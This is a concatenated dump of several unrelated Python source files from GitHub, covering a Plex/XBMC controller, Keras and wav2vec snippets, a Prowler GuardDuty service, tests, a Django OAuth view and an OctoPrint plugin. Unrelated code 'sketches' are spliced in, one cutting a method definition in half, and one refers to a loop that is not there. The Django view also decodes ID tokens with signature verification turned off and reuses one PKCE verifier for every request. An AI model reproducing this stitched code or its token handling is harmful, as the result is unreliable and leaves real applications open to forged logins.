self._rpc.verify():\n raise InvalidRPCConnection()\n\n @property\n def rpc(self):\n return self._rpc\n\n def get_player_properties(self, playerid):\n args = dict(playerid=int(playerid), properties=[\"time\", \"totaltime\", \"speed\", \"shuffled\"])\n resp = self._rpc.execute(\"Player.GetProperties\", args)\n properties = dict()\n try:\n properties['time'] = plexmyxbmc.time_to_millis(resp['time'])\n properties['duration'] = plexmyxbmc.time_to_millis(resp['totaltime'])\n properties['state'] = 'paused' if resp['speed'] is 0 else 'playing'\n properties['shuffle'] = '0' if resp.get('shuffled', False) is False else '1'\n except Exception:\n properties['time'] = 0\n properties['duration'] = 0\n properties['state'] = \"stopped\"\n properties['shuffle'] = '0'\n\n properties['volume'] = self.volume\n return properties\n\n def get_active_players(self):\n return self._rpc.execute('Player.GetActivePlayers', tuple())\n\n def play_media(self, url, offset=0):\n params = dict(\n item=dict(\n file=url,\n ),\n options=dict(\n resume=millis_to_time(offset)\n )\n )\n return self._rpc.execute('Player.Open', params)\n\n def stop(self):\n for player in self.get_active_players():\n playerid = int(player['playerid'])\n self._rpc.execute('Player.Stop', dict(playerid=playerid))\n\n @property\n def volume(self):\n args = dict(properties=['volume'])\n resp = self._rpc.execute('Application.GetProperties', args)\n return resp.get('volume', 100)\n\n @volume.setter\n def 
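# A more compact sketch of the same hex-dump-to-image idea, parsing whole
# tokens instead of single characters; the ".bytes" layout (one leading address
# column followed by hex byte pairs, '??' for unknown bytes) and the 256-pixel
# width are assumptions carried over from the loop above ('??' is mapped to 0
# here, where the loop above skips those bytes entirely).
import numpy as np
from PIL import Image

def bytes_dump_to_image(dump_path, width=256):
    values = []
    with open(dump_path) as f:
        for line in f:
            for tok in line.split()[1:]:        # skip the leading address column
                values.append(0 if tok == "??" else int(tok, 16))
    rows = len(values) // width
    arr = np.array(values[:rows * width], dtype=np.uint8).reshape(rows, width)
    return Image.fromarray(arr[:width], mode="L")  # keep at most `width` rows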
volume(self, val):\n val = int(val)\n args = dict(volume=val)\n self._rpc.execute('Application.SetVolume', args)\n\n def play_pause(self, state):\n assert isinstance(state, bool) is True, 'Expected Bool, got %s' % type(state)\n for player in self.get_active_players():\n playerid = int(player['playerid'])\n self._rpc.execute('Player.PlayPause', dict(playerid=playerid, play=state))\n\n def seek(self, seek_value=0):\n for player in self.get_active_players():\n playerid = int(player['playerid'])\n if isinstance(seek_value, int):\n seek_to = millis_to_time(seek_value)\n elif isinstance(seek_value, str):\n seek_to = seek_value\n else:\n raise ValueError('expected (int, str), found %s' % type(seek_value))\n params = dict(playerid=playerid, value=seek_to)\n self._logger.debug('Seek params %s', str(params))\n self._rpc.execute(\"Player.Seek\", params)\n\n def notify(self, title, msg, duration=5000):\n args = dict(title=title, message=msg, displaytime=duration)\n self._rpc.execute('GUI.ShowNotification', args)\n\n def __str__(self):\n return '{0} at {1}:{2}'.format(\n self.__class__.__name__,\n self._rpc.host,\n self._rpc.port\n )\n\n\nclass XBMCPlexPlayer(XBMC):\n def __init__(self, rpc, plex):\n super(XBMCPlexPlayer, self).__init__(rpc)\n self._plex = plex\n self._metadata = dict()\n\n @property\n def metadata(self):\n return self._metadata\n\n def step(self, plex_value):\n steps = dict(\n stepForward='smallforward',\n stepBack='smallbackward',\n skipNext='bigforward',\n skipPrevious='bigbackward'\n )\n value = steps[plex_value]\n self.seek(value)\n\n def navigate(self, plex_value):\n steps = dict(\n moveUp='Input.Up',\n moveDown='Input.Down',\n moveLeft='Input.Left',\n moveRight='Input.Right',\n select='Input.Select',\n home='Input.Home',\n back='Input.Back'\n )\n value = steps[plex_value]\n self._rpc.execute(value, dict())\n\n def get_timeline(self, playerid, playertype):\n timeline = dict(type=playertype.plex)\n vid = self.metadata.get('video', None)\n container_key = self.metadata.get('containerKey', None)\n \n if playerid > 0:\n prop = self.get_player_properties(playerid)\n timeline.update(prop)\n timeline['controllable'] = \"playPause,play,stop,skipPrevious,skipNext,volume,stepBack,stepForward,seekTo\"\n timeline['seekRange'] = '0-%d' % prop['duration']\n timeline['guid'] = ''\n timeline['machineIdentifier'] = self.metadata.get('machineIdentifier', '')\n\n if vid is not None:\n timeline['address'] = vid.server.address\n timeline['port'] = str(vid.server.port)\n timeline['protocol'] = 'http'\n timeline['key'] = vid.key\n timeline['ratingKey'] = vid.ratingKey\n timeline['subtitleStreamID'] = '-1'\n\n if container_key is not None:\n timeline['containerKey'] = container_key\n timeline['playQueueID'] = container_key.strip().split('/')[-1]\n else:\n if vid is not None:\n timeline['key'] = vid.key\n timeline['state'] = 'stopped'\n timeline['time'] = 0\n return timeline\n\n def get_players_state(self):\n state = dict()\n players = self.get_active_players()\n\n state['location'] = \"navigation\"\n index = 0\n for mediatype in ('audio', 'photo', 'video'):\n mediatype = PlayerType(mediatype)\n player = filter(lambda x: PlayerType(x['type']) == mediatype, players)\n if player:\n playerid = int(player[0]['playerid'])\n state['location'] = 'fullScreen' + mediatype.plex.capitalize()\n else:\n playerid = -1\n\n # hack to generate 'Timeline_', 'Timeline__' or 'Timeline___' to cheat dict2xml\n key = 'Timeline' + ('_' * index)\n state[key] = self.get_timeline(playerid, mediatype)\n state[key]['location'] = 
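# The rpc.execute(method, params) calls above ultimately post JSON-RPC 2.0
# requests to Kodi/XBMC. A minimal sketch of that envelope, purely as an
# assumption about the transport (the real one lives in plexmyxbmc.xbmc_rpc):
import json

def make_rpc_payload(method, params, request_id=1):
    return json.dumps({
        "jsonrpc": "2.0",
        "method": method,        # e.g. "Player.PlayPause"
        "params": params,        # e.g. {"playerid": 1, "play": True}
        "id": request_id,
    })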
state['location']\n index += 1\n\n return state\n\n def play_video(self, video, offset=0):\n # gets a plexapi.video.Video object\n media_parts = [x for x in video.iter_parts()]\n if not media_parts:\n raise Exception(video)\n\n media_part = media_parts[0]\n cached_item = self._plex.storage_mgr.get_cached_item(video, media_part)\n if cached_item:\n self._logger.info('found cached media part %s', str(cached_item))\n else:\n self._logger.info('did not find media part in local cache, playing from remote server')\n\n if cached_item and cached_item.done is True:\n # assumes XBMC is running on the same host as this PMX\n # will implement this via the embedded HTTP server to allow\n # this feature to work with remote XBMC\n #url = 'file://{0}'.format(cached_item.filename)\n url = cached_item.filename\n self._logger.debug('cached media part is fully downloaded! using local file')\n else:\n url = self._plex.authenticated_url(media_part.key)\n self._logger.debug('Using remote file')\n \n self._logger.debug('playing url %s', url)\n self.play_media(url, offset)\n self._metadata['video'] = video\n self._metadata['part'] = media_part\n\n def play_key(self, key, offset=0):\n server = self._plex.server\n item = video.list_items(server, key, video.Episode.TYPE)\n if not item:\n raise Exception()\n\n item = item[0]\n self.play_video(item, offset)\n","repo_name":"goniz/plexmyxbmc","sub_path":"plexmyxbmc/xbmc.py","file_name":"xbmc.py","file_ext":"py","file_size_in_byte":8521,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"4121179929","text":"import keras\nimport numpy as np\nfrom keras.models import Sequential\nfrom keras import layers\n\n# Very basic model\ndef customCNN(img_width, img_height, plot_summary=False):\n model = Sequential()\n model.add(layers.Conv2D(32, (3, 3), activation='relu', input_shape=(img_width, img_height, 3)))\n model.add(layers.MaxPooling2D((2, 2)))\n model.add(layers.Conv2D(64, (3, 3), activation='relu'))\n model.add(layers.MaxPooling2D((2, 2)))\n model.add(layers.Conv2D(128, (3, 3), activation='relu'))\n model.add(layers.Flatten())\n model.add(layers.Dense(64, activation='relu'))\n model.add(layers.Dense(8, activation='softmax'))\n if plot_summary:\n model.summary()\n\n return model\n\n\ndef customCNNv2(img_width, img_height, plot_summary=False):\n model = Sequential()\n\n\n# IDEAS:\n# Empezar con n_h, n_w grande para acabar con n_c grande? Demostrar que mas capas, mas accuracy.\n# Modelo con skip connections => modelo secuencial no vale supongo\n# conv 1x1 para reducir n_c\n# Prunar modelo al final. 
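# A small sketch of the millis_to_time / time_to_millis pair used throughout
# this class, assuming Kodi's JSON-RPC time-object shape
# ({hours, minutes, seconds, milliseconds}); the real helpers live in the
# plexmyxbmc package and may differ in detail.
def millis_to_time(millis):
    millis = int(millis)
    return {"hours": millis // 3600000,
            "minutes": (millis % 3600000) // 60000,
            "seconds": (millis % 60000) // 1000,
            "milliseconds": millis % 1000}

def time_to_millis(t):
    return ((t.get("hours", 0) * 3600 + t.get("minutes", 0) * 60 +
             t.get("seconds", 0)) * 1000 + t.get("milliseconds", 0))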
mecanismo iterativo q busque la mejor solucion\n","repo_name":"cesc47/Machine-Learning-for-Computer-Vision","sub_path":"week5/ourCNN.py","file_name":"ourCNN.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3026680885","text":"import threading\nfrom typing import Optional\n\nfrom pydantic import BaseModel\n\nfrom prowler.lib.logger import logger\nfrom prowler.lib.scan_filters.scan_filters import is_resource_filtered\nfrom prowler.providers.aws.aws_provider import generate_regional_clients\n\n\n################################ GuardDuty\nclass GuardDuty:\n def __init__(self, audit_info):\n self.service = \"guardduty\"\n self.session = audit_info.audit_session\n self.audited_account = audit_info.audited_account\n self.audit_resources = audit_info.audit_resources\n self.audited_partition = audit_info.audited_partition\n self.regional_clients = generate_regional_clients(self.service, audit_info)\n self.detectors = []\n self.__threading_call__(self.__list_detectors__)\n self.__get_detector__(self.regional_clients)\n self.__list_findings__(self.regional_clients)\n self.__list_tags_for_resource__()\n\n def __get_session__(self):\n return self.session\n\n def __threading_call__(self, call):\n threads = []\n for regional_client in self.regional_clients.values():\n threads.append(threading.Thread(target=call, args=(regional_client,)))\n for t in threads:\n t.start()\n for t in threads:\n t.join()\n\n def __list_detectors__(self, regional_client):\n logger.info(\"GuardDuty - listing detectors...\")\n try:\n list_detectors_paginator = regional_client.get_paginator(\"list_detectors\")\n for page in list_detectors_paginator.paginate():\n for detector in page[\"DetectorIds\"]:\n if not self.audit_resources or (\n is_resource_filtered(detector, self.audit_resources)\n ):\n arn = f\"arn:{self.audited_partition}:guardduty:{regional_client.region}:{self.audited_account}:detector/{detector}\"\n self.detectors.append(\n Detector(\n id=detector, arn=arn, region=regional_client.region\n )\n )\n except Exception as error:\n logger.error(\n f\"{regional_client.region} -- {error.__class__.__name__}[{error.__traceback__.tb_lineno}]: {error}\"\n )\n\n def __get_detector__(self, regional_clients):\n logger.info(\"GuardDuty - getting detector info...\")\n try:\n for detector in self.detectors:\n regional_client = regional_clients[detector.region]\n detector_info = regional_client.get_detector(DetectorId=detector.id)\n if \"Status\" in detector_info and detector_info[\"Status\"] == \"ENABLED\":\n detector.status = True\n\n except Exception as error:\n logger.error(\n f\"{regional_client.region} -- {error.__class__.__name__}[{error.__traceback__.tb_lineno}]: {error}\"\n )\n\n def __list_findings__(self, regional_clients):\n logger.info(\"GuardDuty - listing findings...\")\n try:\n for detector in self.detectors:\n regional_client = regional_clients[detector.region]\n list_findings_paginator = regional_client.get_paginator(\"list_findings\")\n for page in list_findings_paginator.paginate(\n DetectorId=detector.id,\n FindingCriteria={\n \"Criterion\": {\n \"severity\": {\n \"Eq\": [\n \"8\",\n ],\n },\n \"service.archived\": {\n \"Eq\": [\n \"false\",\n ],\n },\n }\n },\n ):\n for finding in page[\"FindingIds\"]:\n detector.findings.append(finding)\n\n except Exception as error:\n logger.error(\n f\"{regional_client.region} -- {error.__class__.__name__}[{error.__traceback__.tb_lineno}]: {error}\"\n )\n\n def 
__list_tags_for_resource__(self):\n logger.info(\"Guardduty - List Tags...\")\n try:\n for detector in self.detectors:\n regional_client = self.regional_clients[detector.region]\n response = regional_client.list_tags_for_resource(\n ResourceArn=detector.arn\n )[\"Tags\"]\n detector.tags = [response]\n except Exception as error:\n logger.error(\n f\"{regional_client.region} -- {error.__class__.__name__}[{error.__traceback__.tb_lineno}]: {error}\"\n )\n\n\nclass Detector(BaseModel):\n id: str\n arn: str\n region: str\n status: bool = None\n findings: list = []\n tags: Optional[list] = []\n","repo_name":"gopikrishna72/prowl","sub_path":"prowler/providers/aws/services/guardduty/guardduty_service.py","file_name":"guardduty_service.py","file_ext":"py","file_size_in_byte":4982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16070705906","text":"#!/usr/env\nfrom rosa_util import *\n#mer\n\ndef mer():\n\tl1 = []\n\tl2 = []\n\tl = []\n\tf = open('rosalind_mer.txt','r')\n\tn = int(f.readline().strip())\n\n\tfor i in f.readline().split():\n\t\tl1.append(int(i))\n\n\tm = int(f.readline().strip())\n\tfor i in f.readline().split():\n\t\tl2.append(int(i))\n\n\tfor i in range(n+m):\n\t\tif len(l1) == 0:\n\t\t\twriteResult(' '.join(str(x) for x in l2))\n\t\t\treturn\n\t\t\t#for x in l2:\n\t\t\t#\tl.append(x)\n\t\t\t#\treturn l\n\t\telif len(l2) == 0:\n\t\t\twriteResult(' '.join(str(x) for x in l1))\n\t\t\treturn\n\t\t\t#for x in l1:\n\t\t\t#\tl.append(x)\n\t\t\t#\treturn l\n\t\tif l1[0] == min(l1[0],l2[0]):\n\t\t\twriteResult('mer',str(l1.pop(0))+' ')\n\t\t\t#l.append(l1.pop(0))\n\t\tif l2[0] == min(l1[0],l2[0]):\n\t\t\twriteResult('mer',str(l1.pop(0))+' ')\n\t\t\t#l.append(l2.pop(0))\n\n\t#return l\nmer()\n","repo_name":"ccneko/Rosalind","sub_path":"mer.py","file_name":"mer.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31354000173","text":"import unittest\nimport sys\n\nmodule = sys.argv[-1].split(\".py\")[0]\n\nclass PublicTests(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n global unicos_em_comum\n undertest = __import__(module)\n unicos_em_comum = getattr(undertest, 'unicos_em_comum', None)\n\n def test_exemplo1(self):\n l1 = [ 'A', 'A', 'B', 'C', 'C']\n l2 = ['B', 'A']\n assert unicos_em_comum(l1, l2) == ['B']\n\n def test_exemplo2(self):\n l1 = ['A', 'A', 'B', 'C']\n l2 = ['A', 'B', 'C']\n assert unicos_em_comum(l1, l2) == ['B', 'C']\n\nif __name__ == '__main__':\n loader = unittest.TestLoader()\n runner = unittest.TextTestRunner()\n runner.run(loader.loadTestsFromModule(sys.modules[__name__]))\n","repo_name":"EmanuelSal/Atividades_Programacao-1","sub_path":"questões_tst/unicos_comum/public_tests.py","file_name":"public_tests.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"28889217732","text":"import tkinter as tk\nfrom unittest import mock\nimport pytest\nfrom src.campo_minado import CampoMinado\n\n\n@pytest.mark.parametrize(\"posicao\", [\n (0, 0), \n (0, 7),\n (3, 3),\n (7, 7),\n (5, 3),\n (6, 6),\n (7, 4),\n (4, 5),\n \n \n])\ndef test_game_over_facil(posicao):\n campo_minado = CampoMinado(None, 8, 8, 10)\n\n campo_minado.tabuleiro[posicao[0]][posicao[1]] = -1\n campo_minado.game_over(mostrar_interface=False)\n\n \n assert campo_minado.botoes[posicao[0]][posicao[1]]['text'] == 
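# The per-region fan-out used by __threading_call__ above, isolated as a
# standalone sketch: one thread per regional client, start all, join all.
# `regional_clients` is assumed to be a dict mapping region -> boto3 client.
import threading

def fan_out(regional_clients, call):
    threads = [threading.Thread(target=call, args=(client,))
               for client in regional_clients.values()]
    for t in threads:
        t.start()
    for t in threads:
        t.join()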
'X'\n\n\n\n@pytest.mark.parametrize(\"posicao\", [\n (0, 0), \n (9, 15),\n (0, 15), \n (5, 8),\n (9, 5),\n (8, 2),\n (9, 15),\n (2,5),\n (1, 5),\n \n])\ndef test_game_over_intermediario(posicao):\n campo_minado = CampoMinado(None, 10, 16, 40)\n\n \n campo_minado.tabuleiro[posicao[0]][posicao[1]] = -1\n campo_minado.game_over(mostrar_interface=False)\n\n \n assert campo_minado.botoes[posicao[0]][posicao[1]]['text'] == 'X'\n\n\n\n@pytest.mark.parametrize(\"posicao\", [\n (0, 0), \n (23, 23), \n (0, 23),\n (12, 12),\n (23, 23),\n (22, 22), \n (5, 10), \n (15, 15),\n (19,17),\n (1, 5),\n (9,23),\n])\ndef test_game_over_dificil(posicao):\n campo_minado = CampoMinado(None, 24, 24, 0)\n\n \n campo_minado.tabuleiro[posicao[0]][posicao[1]] = -1\n campo_minado.game_over(mostrar_interface=False)\n\n \n assert campo_minado.botoes[posicao[0]][posicao[1]]['text'] == 'X'\n\n\ndef test_mostrar_bombas_apos_derrota():\n root = tk.Tk()\n campo_minado = CampoMinado(None, 8, 8, 10)\n\n \n bomb_positions = [(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (0, 7), (7, 0)]\n campo_minado.criar_tabuleiro(bomb_positions=bomb_positions)\n\n \n campo_minado.game_over(mostrar_interface=False)\n\n for x in range(8):\n for y in range(8):\n assert campo_minado.botoes[x][y]['state'] == 'disabled'\n\n root.destroy()\n\n","repo_name":"MatheusAndradeUchoa/Campo_minado","sub_path":"test/verificar_GameOver_test.py","file_name":"verificar_GameOver_test.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10148886281","text":"import tkinter as tk\nfrom tkinter import ttk\n\nROOT_GEOMETRY = '300x70'\nFIELD_OPTIONS = {'padx': 5, 'pady': 5}\n\n\nclass App(tk.Tk):\n def __init__(self):\n super().__init__()\n\n self.geometry(ROOT_GEOMETRY)\n self.resizable(False, False)\n\n self.__create_widgets()\n\n def __create_widgets(self) -> None:\n self.rowconfigure(0, weight=1)\n self.columnconfigure(0, weight=1)\n\n self.exposure_btn = ttk.Button(self, text=\"Exposure\")\n self.exposure_btn.grid(column=0, row=0, sticky=tk.NSEW,\n **FIELD_OPTIONS) # type: ignore\n\n\nif __name__ == '__main__':\n app = App()\n app.mainloop()\n","repo_name":"MiLL4U/lightfieldpy","sub_path":"exposure_button.py","file_name":"exposure_button.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32745034146","text":"import threading\n\nclass AsyncResult(object):\n \"\"\"AsyncResult is a convenience class for async methods.\n\n It is intended as an alternative to passing callbacks to async methods\n to be notified when an async operation completes. 
Instead, async methods\n can return this object which the caller can use to wait for a result\n in a non-busy manner.\n \"\"\"\n\n class Timeout(Exception):\n pass\n\n def __init__(self):\n self.event = threading.Event()\n self.result = None\n self.exception = None\n \n def ready(self):\n return self.event.is_set()\n \n def get(self, block=True, timeout=None):\n if not self.ready() and block:\n self.event.wait(timeout)\n \n if not self.ready():\n raise self.Timeout(\"Timeout: result not ready\")\n \n if self.exception is not None:\n raise self.exception\n else:\n return self.result\n\n def set(self, value=None):\n self.result = value\n self.event.set()\n\n def set_exception(self, exception):\n self.exception = exception\n self.event.set()\n","repo_name":"techresidents/trpycore","sub_path":"trpycore/thread/result.py","file_name":"result.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"5843395851","text":"#chap134\r\n\r\ndef remove_even_values(dictionary):\r\n for key, value in dictionary.items():\r\n if value % 2 == 0:\r\n del dictionary[key]\r\n\r\n\r\nmy_dictionary = {\"a\":1, \"b\":2, \"c\":3, \"d\":4}\r\nremove_even_values(my_dictionary) # will throw an error\r\n\r\n# runtime error. dictionary changed size during running\r\n# deletion occurs in the for loop\r\n# mutate the dictionary\r\n# violates dictionary.items()\r\n# an example of risk of mutation\r\n\r\n\r\n","repo_name":"sophiexiaofeixue/python_oop","sub_path":"chap134.py","file_name":"chap134.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35504266591","text":"from .serializers import UserSerializer\nfrom django.contrib.auth import login\nfrom rest_framework.response import Response\nfrom rest_framework import status, permissions\nfrom users.models import User\nfrom rest_framework.decorators import permission_classes, api_view, authentication_classes\nfrom client import settings\nimport requests, random, string, base64, hashlib, jwt, hmac\n\n\nCLIENT_ID = settings.CLIENT_ID\nCLIENT_SECRET = settings.CLIENT_SECRET\nREDIRECT_URI = 'http://127.0.0.1:3000/login/'\n\n# Generate random alphanumeric string of random length up to 128 characters\nCODE_VERIFIER = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(random.randint(43, 128)))\n# Encode in base64 with characters usable in urls\nCODE_VERIFIER = base64.urlsafe_b64encode(CODE_VERIFIER.encode('utf-8'))\n\n# Generate 256-bit hash of code verifier\nCODE_CHALLENGE = hashlib.sha256(CODE_VERIFIER).digest()\n# Encode in url-safe base64, changing bytes to string and remove '=' which has specific meaning in urls\nCODE_CHALLENGE = base64.urlsafe_b64encode(CODE_CHALLENGE).decode('utf-8').replace('=', '')\n\nAUTH_URL = \"http://127.0.0.1:8000/o/authorize/?response_type=code&code_challenge={}&code_challenge_method=S256&client_id={}&redirect_uri={}\".format(CODE_CHALLENGE, CLIENT_ID, REDIRECT_URI)\n\n\n@api_view([\"GET\"])\ndef authorize(request):\n code = request.GET.get(\"code\")\n\n if not code:\n return Response(data={\"url\": AUTH_URL})\n \n else:\n headers = {\n \"Cache-Control\": \"no-cache\",\n \"Content-Type\": \"application/x-www-form-urlencoded\"\n }\n\n data = {\n \"client_id\": CLIENT_ID,\n \"client_secret\": CLIENT_SECRET,\n \"code\": code,\n \"code_verifier\": CODE_VERIFIER,\n \"redirect_uri\": REDIRECT_URI,\n \"grant_type\": 
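# A short usage sketch for the AsyncResult class above: a worker thread fills
# in the value (or an exception) while the caller blocks with a timeout.
import threading

def demo_async_result():
    result = AsyncResult()

    def worker():
        try:
            result.set(21 * 2)
        except Exception as e:
            result.set_exception(e)

    threading.Thread(target=worker).start()
    return result.get(timeout=1.0)   # -> 42, or raises AsyncResult.Timeout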
\"authorization_code\",\n }\n\n auth_request = requests.post(\n \"http://127.0.0.1:8000/o/token/\",\n headers=headers,\n data=data\n )\n\n auth_request = auth_request.json()\n\n user_data = {\n \"access_token\": auth_request.get(\"access_token\"),\n \"expires_in\": auth_request.get(\"expires_in\"),\n \"token_type\": auth_request.get(\"token_type\"),\n \"scope\": auth_request.get(\"scope\"),\n \"refresh_token\": auth_request.get(\"refresh_token\"),\n }\n\n id_token = auth_request.get(\"id_token\")\n\n decrypted_id_token = jwt.decode(\n id_token,\n key=CLIENT_SECRET,\n algorithms=[\"HS256\"],\n options={\"verify_signature\": False}\n )\n\n user_data[\"sub\"] = decrypted_id_token.get(\"sub\")\n user_data[\"username\"] = decrypted_id_token.get(\"username\")\n user_data[\"email\"] = decrypted_id_token.get(\"email\")\n user_data[\"first_name\"] = decrypted_id_token.get(\"first_name\")\n user_data[\"last_name\"] = decrypted_id_token.get(\"last_name\")\n\n user = User.objects.filter(sub=user_data.get(\"sub\"))\n localuser = User.objects.filter(username=user_data.get(\"username\"), sub=None)\n\n # If user with matching foreign ID exists, update fields\n if user.exists():\n serializer = UserSerializer(user[0], data=user_data)\n # If user exists locally and has not been assigned foreign ID\n elif localuser.exists():\n serializer = UserSerializer(localuser[0], data=user_data)\n # Else create new user\n else:\n serializer = UserSerializer(data=user_data)\n\n if serializer.is_valid():\n serializer.save()\n\n return Response(serializer.data)\n ","repo_name":"Altagrave-Git/authclient","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13738406059","text":"#!/usr/bin/env python\nimport torch\nimport librosa\nfrom fairseq.models.wav2vec import Wav2VecModel\n\ncp = torch.load('../data/models/word2vec/wav2vec_large.pt', map_location=torch.device('cpu'))\nmodel = Wav2VecModel.build_model(cp['args'], task=None)\nmodel.load_state_dict(cp['model'])\nmodel.eval()\n\nwave_file_path = '../data/audio/go-forward-two-meters-and-then-stop.rate16k-mono.wav'\n# wav_input = librosa.load(wave_file_path)\nsignal, sr = librosa.load(wave_file_path)\ntensors = torch.from_numpy(signal)\nz = model.feature_extractor(tensors)\nc = model.feature_aggregator(z)\nprint('c:', c)\n","repo_name":"chrisspen/speech-to-text-test","sub_path":"src/test_word2vec.py","file_name":"test_word2vec.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"70040114294","text":"import octoprint.plugin\nfrom jinja2 import BaseLoader, Environment\n\nfrom .const import (\n DEFAULT_SCRIPTS,\n ON_CONNECT,\n ON_CONNECT_OPTIONS,\n TYPE,\n TYPE_OPTIONS,\n WHEN,\n WHEN_OPTIONS,\n)\n\n\nclass GcodeScriptManagerPlugin(\n octoprint.plugin.SettingsPlugin,\n octoprint.plugin.AssetPlugin,\n octoprint.plugin.TemplatePlugin,\n octoprint.plugin.StartupPlugin,\n):\n def __init__(self):\n super().__init__()\n\n defaults = self.get_settings_defaults()\n self._scripts = defaults[\"scripts\"]\n self._update_settings()\n\n def _update_client_settings(self):\n self._plugin_manager.send_plugin_message(\n self._identifier,\n {\n \"settings\": {\n \"scripts\": self._scripts,\n }\n },\n )\n\n ##~~ SettingsPlugin mixin\n\n def get_settings_defaults(self):\n return {\n \"consts\": {\n \"onConnectOptions\": ON_CONNECT_OPTIONS,\n 
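# The PKCE S256 relation the view above relies on, reduced to one function:
# the challenge is the base64url-encoded SHA-256 digest of the verifier with
# the '=' padding stripped, exactly as computed for CODE_CHALLENGE above.
import base64, hashlib

def s256_challenge(verifier: bytes) -> str:
    digest = hashlib.sha256(verifier).digest()
    return base64.urlsafe_b64encode(digest).decode("utf-8").rstrip("=")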
\"typeOptions\": TYPE_OPTIONS,\n \"whenOptions\": WHEN_OPTIONS\n },\n \"scripts\": DEFAULT_SCRIPTS,\n }\n\n def on_settings_save(self, data):\n octoprint.plugin.SettingsPlugin.on_settings_save(self, data)\n self.read_settings()\n\n def read_settings(self):\n self._scripts = self._settings.get([\"scripts\"])\n self._update_settings()\n\n def _update_settings(self):\n self._enabled_script_types = set(sum(\n [[ss[\"type\"] for ss in s[\"scripts\"]] for s in self._scripts],\n start=[]\n ))\n\n def write_settings(self, notify=True):\n self._settings.set([\"scripts\"], self._scripts)\n self._settings.save()\n if notify:\n self._update_client_settings()\n\n ##~~ AssetPlugin mixin\n\n def get_assets(self):\n return {\n \"js\": [\"js/gcodescriptmanager.js\"],\n \"css\": [\"css/gcodescriptmanager.css\"],\n \"less\": [\"less/gcodescriptmanager.less\"],\n }\n\n ##~~ TemplatePlugin mixin\n\n def get_template_configs(self):\n return [\n {\n \"type\": \"settings\",\n \"name\": \"GCODE Script Manager\",\n \"template\": \"gcodescriptmanager_settings.jinja2\",\n \"custom_bindings\": True,\n },\n {\n \"type\": \"sidebar\",\n \"name\": \"GCODE Scripts\",\n \"template\": \"gcodescriptmanager_sidebar.jinja2\",\n \"custom_bindings\": True,\n \"icon\": \"fas fa-scroll\",\n },\n ]\n\n ##~~ StartupPlugin mixin\n\n def on_after_startup(self):\n self.read_settings()\n return super().on_after_startup()\n\n ##~~ GcodeScript Hook\n\n def gcode_script_hook(self, comm, script_type, script_name, *args, **kwargs):\n if not script_type == \"gcode\":\n return None\n if script_name not in self._enabled_script_types:\n return None\n\n should_save = False\n prefix, suffix = \"\", \"\"\n context = {\n \"printer_profile\": comm._printerProfileManager.get_current_or_default(),\n \"last_position\": comm.last_position,\n \"last_temperature\": comm.last_temperature.as_script_dict(),\n \"last_fanspeed\": comm.last_fanspeed,\n }\n\n if script_name in (TYPE.AFTER_PRINT_PAUSED, TYPE.BEFORE_PRINT_RESUMED):\n context.update(\n {\n \"pause_position\": comm.pause_position,\n \"pause_temperature\": comm.pause_temperature.as_script_dict(),\n \"pause_fanspeed\": comm.pause_fanspeed,\n }\n )\n elif script_name == TYPE.AFTER_PRINT_CANCELLED:\n context.update(\n {\n \"cancel_position\": comm.cancel_position,\n \"cancel_temperature\": comm.cancel_temperature.as_script_dict(),\n \"cancel_fanspeed\": comm.cancel_fanspeed,\n }\n )\n\n loader = BaseLoader()\n for script in self._scripts:\n if not script[\"enabled\"]:\n continue\n for _script in script[\"scripts\"]:\n if _script[\"type\"] == script_name:\n self._logger.info(\n \"Adding Gcode Script '%(name)s' on '%(type)s', '%(when)s'\",\n {\n \"name\": script[\"name\"],\n \"type\": _script[\"type\"],\n \"when\": _script[\"when\"],\n }\n )\n template = Environment(loader=loader).from_string(_script[\"script\"])\n rendered = template.render(**context)\n\n if _script[\"when\"] == WHEN.BEFORE_DEFAULT:\n prefix += \"\\n\" + rendered\n else:\n suffix += \"\\n\" + rendered\n\n if script[\"autoDisable\"]:\n script[\"enabled\"] = False\n should_save = True\n\n if should_save:\n self.write_settings()\n\n return prefix, suffix, {}\n\n ##~~ HandleConnect Hook\n\n def handle_connect_hook(self, *args, **kwargs):\n if any([e['onConnect'] != ON_CONNECT.UNCHANGED for e in self._scripts]):\n for script in self._scripts:\n if script[\"onConnect\"] == ON_CONNECT.ENABLED:\n self._logger.info(\n \"Enabling Script on Connect: '%(name)s'\",\n {\"name\": script[\"name\"]}\n )\n script[\"enabled\"] = True\n elif 
